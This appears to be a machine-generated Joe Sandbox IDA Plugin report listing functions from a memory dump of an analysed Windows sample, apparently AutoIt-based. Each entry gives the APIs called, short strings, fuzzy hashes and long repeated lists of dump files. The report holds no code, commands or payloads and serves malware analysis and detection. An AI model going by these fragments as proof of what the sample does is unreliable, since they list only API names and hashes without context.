                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                          • String ID: LPT
                                                                                                                                                          • API String ID: 3222508074-1350329615
                                                                                                                                                          • Opcode ID: 7ff72557e26cb718b3e8e676fe434b3665a34dbc93f85a3ea780fd68843d060c
                                                                                                                                                          • Instruction ID: 37724be9b1d1d3400e50ef4343530a695f4eb499bca1cdd5a5cc50d18b8b5c97
                                                                                                                                                          • Opcode Fuzzy Hash: 7ff72557e26cb718b3e8e676fe434b3665a34dbc93f85a3ea780fd68843d060c
                                                                                                                                                          • Instruction Fuzzy Hash: D7617179A00215AFCB14EF98CC95EAEB7F8EF18710F054169F506AB391DB30AE50CB90
                                                                                                                                                          Function 00121B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 00121B83
                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00121B9C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                                                                          • String ID: @
                                                                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                                                                          • Opcode ID: 394477cc8302df8d920eafe345c60931f2b8d0ce2ff80ae1b5f75e1e01209ff7
                                                                                                                                                          • Instruction ID: a2ad965a6c0a63dbf54e84d4cb796b2bca711ab072e1d70db7dc8443d7ed6276
                                                                                                                                                          • Opcode Fuzzy Hash: 394477cc8302df8d920eafe345c60931f2b8d0ce2ff80ae1b5f75e1e01209ff7
                                                                                                                                                          • Instruction Fuzzy Hash: 4D512872409744ABE320AF14D885BAFBBECFFA9354F41484DF1C8410A5EB7195ACC762
                                                                                                                                                          Function 0016CE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012417D: __fread_nolock.LIBCMT ref: 0012419B
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0016CF49
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0016CF5C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscmp$__fread_nolock
                                                                                                                                                          • String ID: FILE
                                                                                                                                                          • API String ID: 4029003684-3121273764
                                                                                                                                                          • Opcode ID: eb7b23eba2609178b5e5e223659584b628ea3306704342b1ca0b90caa3937722
                                                                                                                                                          • Instruction ID: 6ec49c3ac275f3724b6659f9db110abb4edbc748bd5bebddc2d3c71fa4d5cac9
                                                                                                                                                          • Opcode Fuzzy Hash: eb7b23eba2609178b5e5e223659584b628ea3306704342b1ca0b90caa3937722
                                                                                                                                                          • Instruction Fuzzy Hash: F941E732A00219BBDF20DBA4DC41FEFBBBA9F59710F000469F641E7191D771AA64C790
                                                                                                                                                          Function 0018A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0018A668
                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0018A67D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID: '
                                                                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                                                                          • Opcode ID: 8d999868c2952ba4f54778cb24ddc2737dcaef4e3d121d2768f9aae66a5c889a
                                                                                                                                                          • Instruction ID: be860ae425b54c9a7e6cd18626934d7ed6aa819ec62ff1e48aff68df466667e2
                                                                                                                                                          • Opcode Fuzzy Hash: 8d999868c2952ba4f54778cb24ddc2737dcaef4e3d121d2768f9aae66a5c889a
                                                                                                                                                          • Instruction Fuzzy Hash: 93410875A00309AFEB14DFA8D980BDA7BB5FF09300F64006AE905EB345D770AA41CF91
                                                                                                                                                          Function 001757D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 001757E7
                                                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0017581D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CrackInternet_memset
                                                                                                                                                          • String ID: |
                                                                                                                                                          • API String ID: 1413715105-2343686810
                                                                                                                                                          • Opcode ID: 695ddab48d781dd1a684452abc0646af05ca0186dd96dfbf97737db362c02919
                                                                                                                                                          • Instruction ID: 43df0a309722bf884d875c8a3d8251939211a8b7be4058fad968decd0dec202d
                                                                                                                                                          • Opcode Fuzzy Hash: 695ddab48d781dd1a684452abc0646af05ca0186dd96dfbf97737db362c02919
                                                                                                                                                          • Instruction Fuzzy Hash: 47313E71C01219EBCF15AFA1DC95DEE7FB9FF28300F104019F815A6161DB715956CB60
                                                                                                                                                          Function 00189567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 0018961B
                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00189657
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$DestroyMove
                                                                                                                                                          • String ID: static
                                                                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                                                                          • Opcode ID: e1c21f3373b9f8de83c2fe249cf9f9a7e57f51b795298475c6b0eee14a9bcc8f
                                                                                                                                                          • Instruction ID: 478e3f5116115322e4e90ffbb8fc5e33bc4d4f7b7c7f331ad43481b623f623fb
                                                                                                                                                          • Opcode Fuzzy Hash: e1c21f3373b9f8de83c2fe249cf9f9a7e57f51b795298475c6b0eee14a9bcc8f
                                                                                                                                                          • Instruction Fuzzy Hash: 0F31CF31500604AEEB10AF64DC80FFB77A9FF58360F148519F8A9C7190DB30AD81DB60
                                                                                                                                                          Function 00165B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00165BE4
                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00165C1F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 2223754486-4108050209
                                                                                                                                                          • Opcode ID: 192d7ae6e1aa84b6dbdcecb5fa9be846483e86b54ff42edfcdd326cb44c41cb6
                                                                                                                                                          • Instruction ID: c266f368af1258ba25c3f34f8560c81b473f589ec89be1f3d8c9db501ba63514
                                                                                                                                                          • Opcode Fuzzy Hash: 192d7ae6e1aa84b6dbdcecb5fa9be846483e86b54ff42edfcdd326cb44c41cb6
                                                                                                                                                          • Instruction Fuzzy Hash: 2F31B631600709EBDB25CF99CD85BADBBFEEF45354F180019E981971A0E7709A64DF10
                                                                                                                                                          Function 00176B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __snwprintf.LIBCMT ref: 00176BDD
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __snwprintf_memmove
                                                                                                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                          • API String ID: 3506404897-2584243854
                                                                                                                                                          • Opcode ID: a9c2fdef3e43e9f3b31ae4d82065743283377caec09424d3205669a5cbfba6ac
                                                                                                                                                          • Instruction ID: f0657f2f1458ba3d7a21e5e55735c6e74a8abcca179fd93bcda1d8e5eaf34bf7
                                                                                                                                                          • Opcode Fuzzy Hash: a9c2fdef3e43e9f3b31ae4d82065743283377caec09424d3205669a5cbfba6ac
                                                                                                                                                          • Instruction Fuzzy Hash: FB21D231600528AFCF15EF94DC82EAE77B5EF55700F104465F519E7282DB70EA51CBA2
                                                                                                                                                          Function 001891DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00189269
                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00189274
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                          • String ID: Combobox
                                                                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                                                                          • Opcode ID: 8c4818fc212cb35fc3279c821c4103c30f40a503f2a798e4af17735c35dcdf0b
                                                                                                                                                          • Instruction ID: d778963509ada5c5965c041596a29089ba5a31bf6b0080eed9c51710e5e33934
                                                                                                                                                          • Opcode Fuzzy Hash: 8c4818fc212cb35fc3279c821c4103c30f40a503f2a798e4af17735c35dcdf0b
                                                                                                                                                          • Instruction Fuzzy Hash: F211B671300108BFEF159E54DC81EBB379BEB993A4F144125F9199B290D731DD518BA0
                                                                                                                                                          Function 0018970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013C657
                                                                                                                                                            • Part of subcall function 0013C619: GetStockObject.GDI32(00000011), ref: 0013C66B
                                                                                                                                                            • Part of subcall function 0013C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0013C675
                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00189775
                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 0018978F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                          • String ID: static
                                                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                                                          • Opcode ID: 6dc0901b02e212a00d4be461f678c4d60f9d635260fd78d647f363eaf83b2a19
                                                                                                                                                          • Instruction ID: 72937aa937833023fdee3e35a6aa166ee473af397034ca4b0fab3f32e0d2f63c
                                                                                                                                                          • Opcode Fuzzy Hash: 6dc0901b02e212a00d4be461f678c4d60f9d635260fd78d647f363eaf83b2a19
                                                                                                                                                          • Instruction Fuzzy Hash: AD111472620209AFDB04EFA8D846EFA7BA8EB48314F054529FA56E3240E735E9519F50
                                                                                                                                                          Function 00189424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 001894A6
                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001894B5
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                                                                          • String ID: edit
                                                                                                                                                          • API String ID: 2978978980-2167791130
                                                                                                                                                          • Opcode ID: 415458f3355fedba3955b4e72e8b8267a1ce066b75c619f257bf960f0774acc8
                                                                                                                                                          • Instruction ID: e20f5e89ba2aa72c0d1126232ec50f2b7740b4cb2c7d18421344eb38db47d0b2
                                                                                                                                                          • Opcode Fuzzy Hash: 415458f3355fedba3955b4e72e8b8267a1ce066b75c619f257bf960f0774acc8
                                                                                                                                                          • Instruction Fuzzy Hash: 89116D71100108AFEB10AEA4ED81EFB37A9EB05378F544724F965971D0C775DD929B60
                                                                                                                                                          Function 00165C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00165CF3
                                                                                                                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00165D12
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 2223754486-4108050209
